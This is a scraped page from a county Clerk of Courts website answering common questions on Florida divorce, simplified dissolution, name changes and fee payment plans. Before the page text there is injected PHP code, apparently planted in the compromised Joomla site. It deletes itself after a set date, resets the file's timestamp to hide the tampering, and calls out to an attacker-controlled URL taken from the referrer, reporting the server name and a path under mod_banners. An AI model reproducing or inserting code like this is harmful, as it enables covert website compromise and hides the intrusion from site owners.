check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Marriage / Divorce FAQ's
Home Marriage / Divorce FAQ's

More... Quick Links

Divorce Frequently Asked Questions
  Toggle all descriptions Collapse all descriptions
Frequently Asked Questions (Click to sort)
How are Name Changes processed?

The Clerk's Office sells forms for a petition for name change in the Family Division at the main
Courthouse. There is a filing fee for name changes.

The Clerk's Office cannot give you any legal advice. You are responsible for preparing all necessary
pleadings. If you are unable to proceed without assistance, we suggest you contact an attorney.

How is a Simplified Dissolution of Marriage processed?

Simplified Dissolution of Marriage is a fast, easy and inexpensive procedure for ending a
marriage for eligible couples

To be eligible:

  • Both must agree that the marriage cannot be saved.
  • Both must agree on how to divide property and debts.
  • There must be no minor children of the marriage, and the wife cannot be pregnant.
  • At least one of you must have been a resident of Florida for the past six months.

Both parties must come to the Family Division with picture ID's, and fill out a Petition for
Simplified Dissolution of Marriage. Forms are available in the Clerk's office. An attorney is not
required, but if either of you has any legal questions, consulting an Attorney prior to filing is
advised. The Court will set a date for the Final Hearing at the time of filing.

Please provide four (4) extra copies of your hearing form and two (2) self-addressed stamped
envelopes for both Husband and Wife. You both will receive a copy of the Hearing Notice and
date by mail. This date will be no sooner than twenty (20) days after the filing. Both parties
must appear at the hearing.

The filing fee can be found here. If you do not meet the requirements for a Simplified
Dissolution, you may obtain other Divorce information from the Self-Help Coordinator. The Clerk
cannot assist you. You may act as your own Attorney and do all your own research, or you
may obtain an Attorney.

Are there any options if I cannot pay the filing fee for my case?

There is an option called the Deferred Payment Program. Eligibility is based on income
and number of dependents.

The Deferred Payment program divides the total fees into six (6) monthly payments. There is a
$25.00 application fee due upon filing; this amount is not applied to the total balance.

How do I file for Divorce? What do I do if we both mutually agreed on divorce? Do I have to have an Attorney?

An Attorney is not required to file for Dissolution of Marriage. However, if there are issues that are
not agreed upon or significant issues regarding child custody, child support, alimony, retirement
or pension benefits, it would be in your best interest to consult an attorney.

If you and your spouse decide not to hire an attorney, you may contact the Self-Help Coordinator
for information on the forms required to file for divorce as well as the filing fees and the procedure.

Please note the Self-Help Coordinator is not an Attorney and cannot give you legal advice.

How do I file for Legal Separation?

To file for legal separation, you will need to contact an Attorney. There is no paperwork
available in the Clerk's office or through the Self-Help Coordinator.

What if I want to contact a Judge regarding my case? Can I call his office?

The only way to speak to a Judge outside of Court is through written correspondence.

Note: Anytime a document is submitted into the Court file, a copy must be sent or mailed to the
other party.

Frequently Requested Telephone Numbers:

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.